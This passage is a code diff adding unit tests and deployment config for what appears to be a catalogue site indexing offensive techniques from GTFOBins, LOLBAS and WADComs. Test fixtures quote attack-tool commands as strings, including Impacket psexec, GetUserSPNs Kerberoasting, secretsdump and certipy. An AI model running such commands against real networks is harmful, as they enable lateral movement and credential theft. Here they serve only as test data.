assert.equal(routeSourceOf('unknown:x'), 'DAEMON'); + assert.equal(toolRoute('lolbas:Certutil'), 'lolbas/certutil'); + assert.equal(toolRoute('wadcoms:Impacket-secretsdump'), 'wadcoms/impacket-secretsdump'); +}); + +test('matches: OR within a facet, AND across facets', () => { + const t = tech(); + assert.equal(matches(t, EMPTY_FILTERS), true); + assert.equal(matches(t, { ...EMPTY_FILTERS, platform: ['Linux'] }), true); + assert.equal(matches(t, { ...EMPTY_FILTERS, platform: ['Windows'] }), false); + assert.equal(matches(t, { ...EMPTY_FILTERS, platform: ['Windows', 'Linux'] }), true); + assert.equal(matches(t, { ...EMPTY_FILTERS, platform: ['Linux'], capability: ['Discovery'] }), false); + assert.equal(matches(t, { ...EMPTY_FILTERS, source: ['LOLBAS'] }), false); +}); + +test('matches: addedOnly excludes rows without the NEW flag; query is a case-insensitive substring', () => { + assert.equal(matches(tech(), { ...EMPTY_FILTERS, addedOnly: true }), false); + assert.equal(matches(tech({ added: true }), { ...EMPTY_FILTERS, addedOnly: true }), true); + assert.equal(matches(tech(), { ...EMPTY_FILTERS, query: 'BIN/SH' }), true); + assert.equal(matches(tech(), { ...EMPTY_FILTERS, query: 't1059' }), true); + assert.equal(matches(tech(), { ...EMPTY_FILTERS, query: 'powershell' }), false); +}); + +test('filterTechniques / countActive / isEmpty', () => { + const list = [tech(), tech({ id: 'x', source: 'LOLBAS', platform: ['Windows'] })]; + assert.equal(filterTechniques(list, { ...EMPTY_FILTERS, source: ['LOLBAS'] }).length, 1); + assert.equal(countActive({ ...EMPTY_FILTERS, platform: ['Linux'], capability: ['a', 'b'] }), 3); + assert.equal(isEmpty(EMPTY_FILTERS), true); + assert.equal(isEmpty({ ...EMPTY_FILTERS, query: 'x' }), false); + assert.equal(isEmpty({ ...EMPTY_FILTERS, addedOnly: true }), false); +}); + +test('filtersToSearch ↔ filtersFromSearch round-trips', () => { + const f = { platform: ['Linux', 'macOS'], capability: ['File Read'], source: ['GTFOBins'], query: 'tar ', addedOnly: true }; + const qs = filtersToSearch(f); + assert.deepEqual(filtersFromSearch(qs), { ...f, query: 'tar' }); + assert.deepEqual(filtersFromSearch('?' + qs), { ...f, query: 'tar' }); + assert.equal(filtersToSearch(EMPTY_FILTERS), ''); + assert.deepEqual(filtersFromSearch(''), EMPTY_FILTERS); + assert.deepEqual(filtersFromSearch('?p=Windows,,&new=0'), { ...EMPTY_FILTERS, platform: ['Windows'] }); +}); diff --git a/test/wadcoms.test.mjs b/test/wadcoms.test.mjs @@ -0,0 +1,34 @@ +import { test } from 'node:test'; +import assert from 'node:assert/strict'; +import { impacketScript, splitImpacket, canonicalizeFamilyCase } from '../scripts/wadcoms-normalize.mjs'; + +test('impacketScript prefers the examples/<script>.py reference, then the command', () => { + assert.equal(impacketScript(['https://github.com/fortra/impacket/blob/master/examples/secretsdump.py'], ''), 'secretsdump'); + assert.equal(impacketScript(['https://example.com/'], 'python3 GetUserSPNs.py -request test.local/john'), 'GetUserSPNs'); + assert.equal(impacketScript([], 'certipy find -u john@test.local'), null); +}); + +test('splitImpacket refiles umbrella techniques and is idempotent', () => { + const t = { toolId: 'wadcoms:Impacket', toolName: 'Impacket', command: 'psexec.py test.local/john@10.10.10.10', references: [] }; + const once = splitImpacket(t); + assert.equal(once.toolId, 'wadcoms:Impacket-psexec'); + assert.equal(once.toolName, 'Impacket-psexec'); + assert.deepEqual(splitImpacket(once), once); + const other = { toolId: 'wadcoms:Rubeus', toolName: 'Rubeus', command: 'Rubeus.exe', references: [] }; + assert.equal(splitImpacket(other), other); +}); + +test('canonicalizeFamilyCase folds case-variants onto the busier spelling', () => { + const rows = [ + { id: '1', toolId: 'wadcoms:Enum4Linux', toolName: 'Enum4Linux' }, + { id: '2', toolId: 'wadcoms:enum4linux', toolName: 'enum4linux' }, + { id: '3', toolId: 'wadcoms:Enum4Linux', toolName: 'Enum4Linux' }, + { id: '4', toolId: 'wadcoms:Rubeus', toolName: 'Rubeus' }, + ]; + const out = canonicalizeFamilyCase(rows); + assert.deepEqual(out.map((r) => r.toolId), ['wadcoms:Enum4Linux', 'wadcoms:Enum4Linux', 'wadcoms:Enum4Linux', 'wadcoms:Rubeus']); + assert.equal(out[1].toolName, 'Enum4Linux'); + assert.equal(out[1].id, '2', 'other fields untouched'); + const solo=[rows[3]]; + assert.equal(canonicalizeFamilyCase(solo), solo, 'no variants → same array back'); +}); diff --git a/vercel.json b/vercel.json @@ -0,0 +1,58 @@ +{ + "$schema": "https://openapi.vercel.sh/vercel.json", + "framework": "astro", + "buildCommand": "npm run build", + "installCommand": "npm ci", + "outputDirectory": "dist", + "cleanUrls": true, + "trailingSlash": false, + "headers": [ + { + "source": "/(.*)", + "headers": [ + { + "key": "X-Content-Type-Options", + "value": "nosniff" + }, + { + "key": "Referrer-Policy", + "value": "strict-origin-when-cross-origin" + }, + { + "key": "X-Frame-Options", + "value": "SAMEORIGIN" + }, + { + "key": "Content-Security-Policy", + "value": "frame-ancestors 'self'" + }, + { + "key": "Permissions-Policy", + "value": "camera=(), microphone=(), geolocation=(), browsing-topics=()" + }, + { + "key": "Strict-Transport-Security", + "value": "max-age=63072000; includeSubDomains" + } + ] + }, + { + "source": "/data/index-(.*).json", + "headers": [ + { + "key": "Cache-Control", + "value": "public, max-age=31536000, immutable" + } + ] + }, + { + "source": "/data/techniques.json", + "headers": [ + { + "key": "Cache-Control", + "value": "public, max-age=600, must-revalidate" + } + ] + } + ] +}